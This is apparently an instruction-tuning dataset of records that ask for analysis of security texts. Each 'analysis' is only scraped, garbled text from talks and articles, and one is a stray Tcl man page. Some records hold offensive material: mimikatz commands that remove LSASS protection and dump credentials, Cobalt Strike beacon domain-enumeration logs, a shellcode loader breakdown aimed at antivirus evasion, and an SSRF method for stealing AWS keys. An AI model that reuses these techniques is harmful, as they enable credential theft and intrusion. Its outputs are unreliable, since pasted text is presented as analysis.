{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHACKING TRAFFIC LIGHTS DEFCON 2020 WHO ARE WE? 06/08/2020 HACKING TRAFFIC LIGHTS  Wesley Neelen  Hacker  OSCP / OSCE  8+ years of experience  Internet of Things security  Rik van Duijn  Hacker  OSCP / OSCE  8+ years of experience  Malware analysis DISCLAIMER: NO SMART TRAFFIC EXPERTS . WE DO USE BICYCLES @WESLEYNEELEN @RIKVDUIJN INTRODUCTION TO SMART TRAFFIC 06/08/2020 HACKING TRAFFIC LIGHTS Creating a platform to exchange information:  Road signs  Parking status  Traffic status  Traffic light systems  Road users  Cyclist, cars, trucks, emergency vehicles ... INTRODUCTION TO SMART TRAFFIC 06/08/2020 HACKING TRAFFIC LIGHTS Creating a platform to exchange information:  Road signs  Parking status  Traffic status  Traffic light systems  Road users  Cyclist, cars, trucks, emergency vehicles ... Our research focus 06/08/2020 HACKING TRAFFIC LIGHTS FACTS & FIGURES In the Netherlands:  17+ million citizens - 22.8 million bicycles  35,000 kilometres cycling infrastructure 06/08/2020 HACKING TRAFFIC LIGHTS WAIT A MINUTE, YOU ARE LETTING ME TALK TO TRAFFIC LIGHTS? ONGOING PARTNERSHIPS 06/08/2020 HACKING TRAFFIC LIGHTS Goal:  Safety  Comfort  Traffic flow ONGOING PARTNERSHIPS 06/08/2020 HACKING TRAFFIC LIGHTS Goal:  Safety  Comfort  Traffic flow Apps to connect:  Cyclists, decreases the time to green  Trucks, a green flow  Emergency vehicles, instant green and notify others ONGOING PARTNERSHIPS 06/08/2020 HACKING TRAFFIC LIGHTS Goal:  Safety  Comfort  Traffic flow Apps to connect:  Cyclists, decreases the time to green  Trucks, a green flow  Emergency vehicles, instant green and notify others ONGOING PARTNERSHIPS 06/08/2020 HACKING TRAFFIC LIGHTS Goal:  Safety  Comfort  Traffic flow Apps to connect:  Cyclists, decreases the time to green  Trucks, a green flow  Emergency vehicles, instant green and notify others ONGOING PARTNERSHIPS 06/08/2020 HACKING TRAFFIC LIGHTS Goal:  Safety  Comfort  Traffic flow Apps to connect:  Cyclists, decreases the time to green  Trucks, a green flow", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 10.10.6.188后台模版注getshell-z3r0ne 10.10.6.188 群的师z3r0ne师傅 跑出的admin/admin 后台模版getshell 这抓取密码的时候其实有很多同学会喜欢mimi直接抓hashdump和logpasswords 却忽略了 cached domain logon 如这就抓到了历史域管户登陆虽然密码不对 抓到域户shirts\\ehahn的密码 尝试查看当前域户的sid和当前户登陆的机器 以及获取域机器和 ms-ds-creatorsid来寻找ehahn能完全控制的主机结果没得这也可以 adfind收集当前域户信息和域全部电脑信息 1 beacon> shell adfind.exe -h 10.10.4.169 -sc u:ehahn 2 [*] Tasked beacon to run: adfind.exe -h 10.10.4.169 -sc u:ehahn 3 [+] host called home, sent: 69 bytes 4 [+] received output: 1 Get-DomainObjectAcl -Identity [computerName] | ?{$_.SecurityIdentifier -match \"SI 5 6 AdFind V01.51.00cpp Joe Richards (support@joeware.net) October 2017 7 8 Using server: plaid.shirts.corp:389 9 Directory: Windows Server 2012 R2 10 11 dn:CN=Efrain Hahn,CN=Users,DC=shirts,DC=corp 12 >objectClass: top 13 >objectClass: person 14 >objectClass: organizationalPerson 15 >objectClass: user 16 >cn: Efrain Hahn 17 >sn: Hahn 18 >givenName: Efrain 19 >distinguishedName: CN=Efrain Hahn,CN=Users,DC=shirts,DC=corp 20 >instanceType: 4 21 >whenCreated: 20180415164237.0Z 22 >whenChanged: 20211016063847.0Z 23 >displayName: Efrain Hahn 24 >uSNCreated: 30647 25 >memberOf: CN=RDP_Users,CN=Users,DC=shirts,DC=corp 26 >memberOf: CN=App2_Admin,CN=Users,DC=shirts,DC=corp 27 >memberOf: CN=Local_Admin_WRK3,CN=Users,DC=shirts,DC=corp 28 >memberOf: CN=Local_Admin_SRV4,CN=Users,DC=shirts,DC=corp 29 >memberOf: CN=Local_Admin_SRV3,CN=Users,DC=shirts,DC=corp 30 >memberOf: CN=Local_Admin_SRV1,CN=Users,DC=shirts,DC=corp 31 >memberOf: CN=Database Admins,CN=Users,DC=shirts,DC=corp 32 >memberOf: CN=Web Server Admins,CN=Users,DC=shirts,DC=corp 33 >uSNChanged: 151650 34 >name: Efrain Hahn 35 >objectGUID: {2D45BF0E-7683-4AD5-9140-4C005000C944} 36 >userAccountControl: 66048 37 >badPwdCount: 0 38 >codePage: 0 39 >countryCode: 0 40 >homeDirectory: \\\\NYCFP16C\\home$\\ehahn 41 >homeDrive: H 42 >badPasswordTime: 132788427871868219 43 >lastLogoff: 0 44 >lastLogon: 132788444996540016 45 >pwdLastSet: 131682841575168133 46 >primaryGroupID: 513 47 >obje", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCS download shellcode 分析 CS version:4.3 CS端IP172.16.80.3 choose a payload to stagewindows/beacon_https/reverse_https 在成加载shellcode的程序之后放到x32dbg 定位到shellcode执的地址 在将DF标志清零后CLD紧接着个call这个call主要是把 wininet这个字符串栈 FS寄存器指向当前活动线程的TEB结构在这个结构体的0x30的位置是PEB结构地址接着去找PEB_LDR_DATA这个 结构体从双向链表中去寻找我们想要的DLL这个DLL就是之前我们栈的那个wininet 再知道了这点以后后的好个跳转和较指令其实可以不看了 我们来到这会有个jmp eax 在这上的第个pop上断下来 运到push ecx之前在这是通过loadlibrary加载wininet这个dll这个jmp eax 是 call eax call eax 等于两条汇编指令 1把当前的下个地址栈 2跳转到eax 这采的是 push ecxjmp eax 实现了callpop会把栈给弹出来这个pop后的栈是我们函数执的参数 如何判断有个参数需要借助MSDN 官档 接下来继续运到这个断点运到 push ecx 之前 第个函数 InternetOpen NULL,NULL,NULL,NULL,NULL 全部都NULL 第个函数InternetConnectAInternetOpen handle,IP,PORT,NULL,NULL,0X00000003,NULL 第个参数为 InternetOpen的句柄 通过多运次断点我们可以把 CS 的shellcode的API给梳理出来 HINTERNET InternetOpenW( [in] LPCWSTR lpszAgent, [in] DWORD dwAccessType, [in] LPCWSTR lpszProxy, [in] LPCWSTR lpszProxyBypass, [in] DWORD dwFlags ); wininte.InternetOpen()//初始化应程序对 WinINet 函数的使 wininet.InternetConnectA() //创建链接信息 wininet.HttpOpenRequestA()//创建个 HTTP 请求句柄 嗯这就是个下载者阿我这边请求的地址是在HttpOpenRequestA的/IzML 这需要注意的是 /IzML 这个路径是由CS随机的内容为 wininet.InternetSetOptionA()//设置 Internet 选项 CS的默认为 \"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\\r\\n\" wininet.HttpSendRequestA()//发送请求 user32.GetDesktopWindow() //检索桌窗的句柄桌窗覆盖整个屏幕桌窗是在其上绘制其他窗 的区域 wininet.InternetErrorDlg //如果存在适当的对话框则显示传递给 InternetErrorDlg的错误的对话框如 果使了 FLAGS_ERROR_UI_FILTER_FOR_ERRORS标志该函数还会检查标题中是否存在任何隐藏的错误并在需 要时显示个对话框 kernel32.VirtualAlloc //创建内存 wininet.InternetReadFile//读取数据 这也是段shellcode针对这部分shellcode的分析的下篇章会出 总结 简化下整个流程 1.http请求 shellcode 2.创建内存 3.读取shellcode 4.执 在知道原理后可以更加灵活的去写代码就是个http download 以及 内存加载如果我们使windows的 API函数的话下这个就够了 1.InternetOpenA 2.InternetOpenUrlA 3.InternetReadFile 4.VirtualAlloc 当然你也可以socket 实现http download 其实写这篇章的初衷是过年太聊了就想写个在shellcode中通过添加花指令缩短指令等实现在红队的项中 进快速免杀遂分析起来了 CS的shellcode", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass LSA Protection 0x01 LSA Protection 1LSA & LSASS LSASS (Local Security Authority Subsystem Service Windows LSA (Local Security Authority Lsass 2LSA Protection Win8.1 LSA Lsa Protection mimikatz LSA Microsoft LSA 0x02 LSA Protection & Bypass 1 LSA Protection RunAsPPL 1 Lsass LSA Protection Lsa ID 12 reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v RunAsPPL /t REG_DWORD /d 00000001 /f 1 wevtutil qe System /f:text /rd:true /c:1 \"/q:*[System [(EventID=12)]]\" 1 Lsass Lsa Propection mimikatz 2Bypass Lsa Protection Bypass Lsa Protectionmimikatz Mimidrv.sys Mimidrv.sys WindowsWDM privilege::debug !+ !processprotect /process:lsass.exe /remove sekurlsa::logonpasswords 1 2 3 4 Bypass SAM << Hash Hash>> privilege::debug token::elevate lsadump::sam 1 2 3 0x03 https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997 https://docs.microsoft.com/en-us/windows/win32/wes/windows-event-log", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: return.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAlexander Lash Outline  Disclaimers  Why I Do This  Basic Skills  Feature -phones  Light Modification  Heavy Modification  Smartphones  BlackBerry  Symbian  Windows Mobile  iPhone This Talk is NOT  an endorsement  a detailed guide  about a particular phone  except when it is.  about carriers  ok, fine, its mostly about carriers. More Disclaimers!  This can break your phone  keep backups  This may break your contract  if your carrier finds out  Your carrier CAN and WILL charge you  dont use BitTorrent on a tether  This targets the USA cell market  your mileage will vary elsewhere Outline  Disclaimers  Why I Do This  Basic Skills  Feature -phones  Light Modification  Heavy Modification  Smartphones  BlackBerry  Symbian  Windows Mobile  iPhone A Brief History of Tethering  Of course you can! (circa 2000)  Cheap data cables, too!  Try Customer Service. (circa 2002)  Two hours and a special password needed.  You need the secret code. (circa 2004)  ##DIALUP? Thanks, Motorola!  Thats $60/month. (circa 2006)  Yes, it was free on your last phone. Other Innovations  Crippled Bluetooth  Buying headsets good, ringtones bad!  Scare Tactics  The legendary $20,000 cellphone bill  Media Transfer Fees  Yay DRM!  Locked Application Platforms  Yay $10 Solitaire!  and many more. In Memoriam  7868w (pickup truck)  VX4400 (four-story fall)  v710 #1 (broken camera)  v710 #2 (class action replacement)  e815 (dead display controller)  v3c #1 (dead memory controller)  v3c #2 (killed by Verizon's software updater)  v3m #1 (broken microSD slot)  v3m #2 (broken radio)  k1m #1 (still not sure) Outline  Disclaimers  Why I Do This  Basic Skills  Feature -phones  CDMA  GSM  Smartphones  BlackBerry  Symbian  Windows Mobile  iPhone Dealing With Your Carrier  Use Automated Systems First  NOTE: CDMA carrier lock iscarrier-side  Be Circumspect  Find faults in features youre paying for  Be Courteous  Keep Talking  Stress simple points  Stress that you need to make calls  unless youre not paying for that ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTP认证方案 Authorh0ld1rsReclu3e 前言 因为HTTP协议是开放的可以任人调用所以如果接口不希望被随意调用就需要做访问权限的控 制认证好的用户才允许调用API 本篇文章在郁离歌师傅的指导下参考RFC对HTTP常用的认证方案做了归纳总结 Form认证 最常见的一种认证方式即表单认证表单认证一般都会配合cookie+sessiond的使用现在绝大多数 的Web站点都是使用此认证方式用户在登录页中填写用户名和密码服务端认证通过后会将sessionId 返回给浏览器端浏览器会保存sessionId到浏览器的Cookie中因为Http是无状态的所以浏览器使用 Cookie来保存sessionId下次客户端发送的请求中会包含sessionId值服务端发现sessionId存在并认 证过则会提供资源访问 值得一提的是Cookie+Session 认证属于Form认证Form认证并不属于HTTP标准验证 Basic(RFC7617)  传输将凭据作为用户 ID/ 传输密码对使用 Base64 编码  是基于客户端类型最基本的认证方案  服务器只有在可以验证时才会为请求提供服务申请的保护空间的用户名和密码 请求的资源  特征response: Unauthorized Authorization头中数据 Basic 请求头数据 WWW-Authorization  认证方式 Basic  realm  安全域 base64(username:password) 数据包举例 HTTP HTTP/1.1 401 Unauthorized Date: Mon, 04 Feb 2014 16:50:53 GMT WWW-Authenticate: Basic realm=\"WallyWorld\" //其中WallyWorld是服务器分配的用于标识保护空间的字符串 认证方法 1. 客户端发送请求服务器端接受请求后判断如果请求的资源需要认证则返回401状态并在 response headers中加入WWW-Authenticate头部要求客户端带上认证信息以后再发一次请求 2. 客户端收到401返回信息后重新向服务器发送请求并在request headers中加入Authoriaztion 头部用来说明认证的用户名密码算法等信息 3. 服务器端从用户那里取得用户ID与密码  但用户ID与密码不得包含任何控制字符  包含冒号字符的用户ID是无效的  许多用户代理会在不检查  用户提供的用户 ID 是否包含冒号的情况下生成用户传递字符串 然后收件人会将输入的用户 名的一部分视为密码的一部分 4. 通过冒号(:)连接用户ID来构造用户通行证字符和密码 5. 将用户密码编码为八字节序列 6. 通过使用base64使得方式转化为US-ASCLL字符序列 7. 服务器再次收到请求后判断以上认证信息无误返回200并在response headers中加入 Authorization-Info头部 缺陷 1. 此认证方案的原始定义未能指定用于将用户密码转化为八位字节序列的字符串编码方案 2. 大多数实现取决于特定的环境编码例如ISO-8859-1,UTF-8 3. 出于向后兼容的原因该规范继续保留未定义的默认编码只要他与US-ASCLL兼容 4. 假冒服务器很容易骗过认证诱导用户输入用户名和密码 5. 即使密码被强加密第三方仍可通过加密后的用户名和密码进行重放攻击 为了传输安全需要配合SSL使用 代理授权 出现在RFC 7235上还是属于basic认证 HTTP Proxy-Authorization请求标头包含用于向代理服务器认证用户代理的凭证通常在服务器响应 407 Proxy Authentication Required状态和Proxy-Authenticate标题后 如:Proxy-Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l 实际举例 如下图就是基本的http认证,浏览器弹出基本的对话框 如果认证失败则返回如下 当请求成功的时候返回的数据包如下 HTTP服务器在每次收到请求包后根据协议取得客户端附加的用户信息BASE64编码的用户名和密 码解开请求包对用户名及密码进行验证如果用 户名及密码正确则根据客户端请求返回客户 端所需要的数据;否则返回错误代码或重新要求客户端提供用户名及密码 实现 Apache 要对Apache服务器上的目录进行密码保护 你需要一个 .htaccess 和 a .htpasswd 文件. 该 .htaccess 文件格式通常看起来像这样: 该 .htaccess 文件引用一个 .htpasswd 文件,其中每行用冒号分隔的用户名和密码. 你不能看到真 实的密码因为它们", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/por/login_auth.csp?apiversion=1 HTTP/1.1 200 OK Date: Thu, 01 Apr 2021 01:11:26 GMT Server: Server X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Pragma: no-cache Cache-Control: no-cache Content-Length: 2434 X-Robots-Tag: noindex, nofollow, noarchive, nosnippet, nosnippet, notranslate, noimageindex Connection: close Content-Type: text/xml;charset=utf-8 <?xml version=\"1.0\" encoding=\"utf-8\"?> <Auth> <ErrorCode>1</ErrorCode> <Message>login auth success</Message> <CSRF_RAND_CODE>783769751</CSRF_RAND_CODE> <IS_UNFORCE_INSTALLECAGENT>0</IS_UNFORCE_INSTALLECAGENT> <DKEY_VER_ENABLE>0</DKEY_VER_ENABLE> <MID_ATK_CHECK>0</MID_ATK_CHECK> <StartAuth>1</StartAuth> <!-- return next auth type --> <clientRunMode>0</clientRunMode> <TwfID>04d000294c2cbdc1</TwfID> <!-- twfid from server --> <RndImg>0</RndImg> <!-- image check --> <Anonymous>0</Anonymous> <!-- anonymous login allowed or not --> <Deny_normal_user>0</Deny_normal_user> <!-- normal user login allowed or not --> <Autoinstall>1</Autoinstall> <!-- auto install components enabled or not --> <Softkey>0</Softkey> <!-- soft key enable or not --> <enablesavepwd>0</enablesavepwd> <!-- save password enable or not --> <enableautologin>0</enableautologin> <!-- auto login enable or not --> <enableautoRelogin>0</enableautoRelogin> <!-- auto relogin enable or not --> <enablethirdpartycert>0</enablethirdpartycert> <enablewechatqrcode>0</enablewechatqrcode> <certcodetype>UTF-8</certcodetype> <Is_enable_mult_client>NULL</Is_enable_mult_client> <!--enable mulit client --> <Mult_client_guid>NULL</Mult_client_guid> <!--mulit client guid--> <Is_multclient_version>0</Is_multclient_version> <!--is mulit client version--> <Multiline></Multiline> <DomainSSOEnable>0</DomainSSOEnable> <DomainSSOUrl></DomainSSOUrl> <DenyAccessWithoutCom>0</DenyAccessWithoutCom> <DeviceType>ssl</DeviceType> <!-- ssl or vsp --> <SSLCipherSuite> <EC>AES128-SHA</EC> </SSLCipherSuite> <RSA_ENCRYPT_KEY>AB45980970275F799AB779346A87027DC86A5404525361BEEE8F8784DED", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Javatrick之利URL的file协议列录 LxLN 前 LxLO 正 LxLP debug跟踪 LxLQ 总结 这个技巧感觉挺有意思还是在微信群的赛博回忆录,讨论的时候看到的篇章 0x01 前 2 接着和钧钧讨论的时候发现作者是这样玩的 感觉挺有趣,深深的破坏了我对file://这个协议的看法 以前直以为只能读件,没想到在java还能读录特记录波 0x02 正 3 Plain Text 复制代码 平时我对file协议就是读件 也就是类似file:///etc/passwd这样 但是在看那个章的时候 看到作者是类似这样玩的file:///etc/ 然后钧和我也试了下,并且成功把录列了出来 1 2 3 4 5 Java 复制代码 # 先我们先看个例代码 import java.io.*; import java.net.URL; import java.net.URLConnection; public class test { public static void main(String[] args) { try { // 漏洞利点 String url = \"file:///etc/\"; // 实例化url的对象 URL u = new URL(url); //打开个URL连接并运客户端访问资源 URLConnection connection = u.openConnection(); connection.connect(); connection.getInputStream(); StringBuilder response = new StringBuilder(); //获取url中的资源 BufferedReader in = new BufferedReader( new InputStreamReader(connection.getInputStream(), \"UTF-8\")); String line; while ((line = in.readLine()) != null) { response.append(line + \"\\n\"); } in.close(); System.out.print(response.toString()); } catch (Exception e) { e.printStackTrace(); } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 4 运以后可以发现把我电脑的/etc录列了出来 然后就好奇啊,为什么其它的语不,java可以所以就想跟下 0x03 debug跟踪 5 6 7 8 可以清楚的看到,不是ftp的话就进下的else所以直接跟进去即可 9 没事多看看群是有好处的 :) 0x04 总结", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CTF 竞赛模式简介 ## 解题模式 - Jeopardy 解题模式Jeopardy常见于线上选拔比赛在解题模式 CTF 赛制中参赛队伍可以通过互联网或者现场网络参与参数队伍通过与在线环境交互或文件离线分析解决网络安全技术挑战获取相应分值类似于 ACM 编程竞赛信息学奥林匹克赛根据总分和时间来进行排名 不同的是这个解题模式一般会设置 **一血**  **二血**  **三血** 也即最先完成的前三支队伍会获得额外分值所以这不仅是对首先解出题目的队伍的分值鼓励也是一种团队能力的间接体现 当然还有一种流行的计分规则是设置每道题目的初始分数后根据该题的成功解答队伍数来逐渐降低该题的分值也就是说如果解答这道题的人数越多那么这道题的分值就越低最后会下降到一个保底分值后便不再下降 题目类型主要包含 **Web 网络攻防**  **RE 逆向工程**  **Pwn 二进制漏洞利用**  **Crypto 密码攻击**  **Mobile 移动安全** 以及 **Misc 安全杂项** 这六个类别 ## 战争分享模式 - Belluminar 在 2016 年世界黑客大师挑战赛WCTF国内首次引入韩国 POC SECURITY 团队开创的 BELLUMINAR CTF 战争与分享赛制从此中国国内陆陆续续也有开始 BELLUMINAR 模式的比赛目前采取这一赛制的有 2016 年诸葛建伟老师集合的 XMan 夏令营分享赛以及同年 9 月的百度杯CTF 比赛 同时这里也有 BELLUMINAR 赛制的介绍官网 <http://belluminar.org/> ### 赛制介绍 > Belluminar, hacking contest of POC, started at POC2015 in KOREA for the first time. Belluminar is from 'Bellum'(war in Latin) and 'seminar'. It is not a just hacking contest but a kind of > festival consisted of CTF & seminar for the solution about challenges. Only invited teams can join Belluminar. Each team can show its ability to attack what other teams want to protect and can > defend what others want to attack. 如官网介绍这样BELLUMINAR CTF 赛制由受邀参赛队伍相互出题挑战并在比赛结束后分享赛题的出题思路学习过程以及解题思路等战队评分依据出题得分解题得分和分享得分进行综合评价并得出最终的排名 ### 出题阶段 > 每个队伍需要提出两个Challenge到challenge题库 首先各个受邀参赛队伍都必须在正式比赛前出 2 道Challange参赛队伍将有 12 周的时间准备Challenge出Challenge的积分占总分的 30% > Challenge 1: must be on the Linux platform; > > Challenge 2: No platform restriction(except Linux) No challenge type restriction (Pwn, Reverse...) 传统的 BELLUMINAR 赛制要求出的两道Challenge中一道 Challenge 必须是在 Linux 平台另外一个Challenge则为非 Linux 平台两个 Challenge 的类型没有做出限制因此队伍可以尽情展现自己的技术水平 为使比赛Challenge类型比较均衡也有采用队伍抽签出Challenge的方式抽取自己的Challenge这要求队伍能力水平更为全面因此为了不失平衡性也会将两道 Challenge 的计入不同分值比如要求其中一道 Challenge 分值为 200而另外一道分值则为 100 ### 提交部署 题目提交截止之前各个队伍需要提交完整的文档以及解题 Writeup文档中要求详细标明题目分值题面出题负责人考察知识点列表以及题目源码而解题 Writeup中则需要包含操作环境完整解题过程以及解题代码 题目提交之后主办方会对题目和解题代码进行测试如果期间出现问题则需要该题负责人配合以解决问题最终放到比赛平台上 ### 解题竞技 进入比赛后各支队伍可以看到所有其他团队出的题目并发起挑战但是不能解答本队出的题目不设 First Blood 奖励根据解题积分进行排名解题积分占总分的 60% ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 整数溢出介绍 在C语言中整数的基本数据类型分为短整型(short)整型(int)长整型(long)这三个数据类型还分为有符号和无符号每种数据类型都有各自的大小范围(因为数据类型的大小范围是编译器决定的所以之后所述都默认是 64 位下使用 gcc-5.4)如下所示: | 类型 | 字节 | 范围 | | :-: | :-: | :-: | | short int | 2byte(word) | 0\\~32767(0\\~0x7fff) <br> -32768\\~-1(0x8000\\~0xffff) | | unsigned short int | 2byte(word) | 0\\~65535(0\\~0xffff) | | int | 4byte(dword) | 0\\~2147483647(0\\~0x7fffffff) <br> -2147483648\\~-1(0x80000000\\~0xffffffff) | | unsigned int | 4byte(dword) | 0\\~4294967295(0\\~0xffffffff) | | long int | 8byte(qword) | 正: 0\\~0x7fffffffffffffff <br> 负:0x8000000000000000\\~0xffffffffffffffff | | unsigned long int | 8byte(qword) | 0\\~0xffffffffffffffff | 当程序中的数据超过其数据类型的范围则会造成溢出整数类型的溢出被称为整数溢出 ### 整数溢出关于上界溢出 ``` # 伪代码 short int a; a = a + 1; # 对应的汇编 movzx eax, word ptr [rbp - 0x1c] add eax, 1 mov word ptr [rbp - 0x1c], ax unsigned short int b; b = b + 1; # assembly code add word ptr [rbp - 0x1a], 1 ``` 上界溢出有两种情况一种是 `0x7fff + 1` 另一种是 `0xffff + 1` 因为计算机底层指令是不区分有符号和无符号的数据都是以二进制形式存在(编译器的层面才对有符号和无符号进行区分产生不同的汇编指令) 所以 `add 0x7fff, 1 == 0x8000`这种上界溢出对无符号整型就没有影响但是在有符号短整型中`0x7fff` 表示的是 `32767`但是 `0x8000` 表示的是 `-32768`用数学表达式来表示就是在有符号短整型中 `32767+1 == -32768` 第二种情况是 `add 0xffff, 1`这种情况需要考虑的是第一个操作数 比如上面的有符号型加法的汇编代码是 `add eax, 1`因为 `eax=0xffff`所以 `add eax, 1 == 0x10000`但是无符号的汇编代码是对内存进行加法运算 `add word ptr [rbp - 0x1a], 1 == 0x0000` 在有符号的加法中虽然 `eax` 的结果为 0x10000但是只把 `ax=0x0000` 的值储存到了内存中从结果看和无符号是一样的 再从数字层面看看这种溢出的结果在有符号短整型中`0xffff==-1-1 + 1 == 0`从有符号看这种计算没问题 但是在无符号短整型中`0xffff == 65535, 65535 + 1 == 0` ### 整数溢出关于下界溢出 下届溢出的道理和上界溢出一样在汇编代码中只是把 `add` 替换成了 `sub` 一样也是有两种情况 第一种是 `sub 0x0000, 1 == 0xffff`对于有符号来说 `0 - 1 == -1` 没问题但是对于无符号来说就成了 `0 - 1 == 65535` 第二种是 `sub 0x8000, 1 == 0x7fff`对于无符号来说是 `32768 - 1 == 32767` 是正确的但是对于有符号来说就变成了 `-32768 - 1 = 32767` ### 整数溢出未限制范围举例 这种情况很好理解比如有一个固定大小的桶往里面倒水如果你没有限制倒入多少水那么水则会从桶中溢出来 一个有固定大小的东西你没有对其进行约束就会造成不可预期的后果 简单的写一个示例: ```c $ cat test.c #include<stddef.h> int main(void) { int len; int data_len; int header_len; char *buf; header_len = 0x10; scanf(\"%uld\", &data_len); len = data_len", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2017/12/07 HITCON PACIFIC 1 KRACK & ROCA 吳忠憲 1,3 陳君明 1,2,3 J.-S. Wu Jimmy Chen 1. NTU, National Taiwan University 2. IKV, InfoKeyVault Technology 3. CHROOT & HITCON Agenda  KRACK  Key Reinstallation Attacks  Serious weaknesses in WPA2, a protocol that secures all modern protected Wi-Fi networks  ROCA  Return of Coppersmiths Attack  A vulnerability in the implementation of RSA key pair generation in a cryptographic library used in a wide range of cryptographic chips 2017/12/07 HITCON PACIFIC 2 KRACK 2017/12/07 HITCON PACIFIC 3 14 Years of WPA/WPA2  1997: WEP (completely broken)  2003: WPA  2004: WPA2  Many attacks against Wi-Fi, but  Handshake & encryption remain secure  Until 2017  KRACK discovered by Mathy Vanhoef 2017/12/07 HITCON PACIFIC 4 2017/12/07 HITCON PACIFIC 5 10 CVE IDs for KRACKs  Targeting different aspects of WPA/WPA2  CVE-2017-130{77,78,79,80,81}  CVE-2017-130{82,84,86,87,88} 2017/12/07 HITCON PACIFIC 6 10 CVE IDs for KRACKs  Targeting different aspects of WPA/WPA2  CVE-2017-130{77,78,79,80,81}  CVE-2017-130{82,84,86,87,88}  Lets see how to KRACK the 4-way handshake 2017/12/07 HITCON PACIFIC 7 Before the 4-way Handshake  A client and an AP need to setup a shared secret master key MK 2017/12/07 HITCON PACIFIC 8 Personal Network 2017/12/07 HITCON PACIFIC 9 MK = Password MK = Password MK = Password MK = Password Enterprise Network 2017/12/07 HITCON PACIFIC 10 MK1 MK1 MK3 MK3 MK2 MK2 MK4 MK4 MK5 MK5 802.1X PEAP Certificate Username Password The 4-way Handshake  Based on a shared MK between an AP and a client  Mutual authentication  Negotiate a fresh temporal key TK  for actual encryption  can be refreshed 2017/12/07 HITCON PACIFIC 11 2017/12/07 HITCON PACIFIC 12 Msg1 (ANonce) Msg2 (CNonce, ) Msg3 () Msg4 () Client AP compute TK install TK reset PN compute TK install TK reset PN setup MK setup MK WPA2 Wi-Fi Encryption  3 parameters are installed on both ends  the temporal key TK  the RxPN (replay counter)  the TxPN (encryption nonce)  Using CCM or GCM with", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdminer Server Side Request Forgery (SSRF) Adam Crosser Brian Sizemore Description: We have discovered a way to use adminer to send arbitrary get requests and retrieve JSON responses from internal servers. Specifically, this was demonstrated in order to extract AWS access keys from the AWS metadata service. Impact: The impact of this finding will be dependent upon the sensitivity of resources available on the internal network. Theoretically, an attacker could automate the use of this vulnerability to perform some scanning activities and enumerate the internal environment. In the case of an AWS server, the impact will likely be related to the permissions granted to the server and an attackers ability to escalate or move laterally with the compromised AWS keys. Attack Explanation and Demonstration: The following steps were used to demonstrate the attack. First, a python server was started which listened for incoming connections and responded with a 301 redirect to an arbitrarily chosen host. In this example case, the redirect was pointed at the AWS metadata service: http://169.254.169.254/latest/meta-data/instance-id Then the Elasticsearch login module was used within Adminer to login to the server running the python code which resulted in Adminer printing the json response from the metadata server containing the servers AWS instance-id. The screenshots below demonstrate the successful attack. A copy of the python script used to redirect the request can be found here: https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd In order to 